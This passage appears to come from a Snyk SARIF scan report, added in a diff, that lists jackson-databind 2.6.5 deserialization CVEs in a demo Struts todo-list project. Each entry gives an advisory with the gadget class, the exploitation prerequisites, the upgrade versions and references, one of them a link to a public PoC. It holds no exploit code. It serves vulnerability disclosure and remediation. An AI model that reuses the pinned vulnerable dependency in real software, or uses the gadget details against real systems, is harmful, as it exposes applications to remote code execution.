"text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-10969) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `javax.swing.JEditorPane`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2642)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-10968) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `org.aoju.bus.proxy.provider.remoting.RmiProvider` (aka bus-proxy).\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2662)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-11113) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.openjpa.ee.WASRegistryManagedRuntime` (aka openjpa).\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2670)\n- [PoC](https://github.com/Al1ex/CVE-2020-11113)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-11111) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadgets `org.apache.activemq.*` (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms).\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2664)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-11112) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.commons.proxy.provider.remoting.RmiProvider` (aka apache/commons-proxy).\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n# References\n- [GItHub Commit](https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2666)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-11620) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.jelly.impl.Embedded` (aka `commons-jelly`).\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2682)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-11619) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.springframework.aop.config.MethodLocatingFactoryBean` (aka `spring-aop`).\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n# References\n- [GitHub Issues](https://github.com/FasterXML/jackson-databind/issues/2680)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-14062) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool` (`xalan2`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70)\n- [Github Issue](https://github.com/FasterXML/jackson-databind/issues/2704)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-14195) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.jsecurity.realm.jndi.JndiRealmFactory`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method 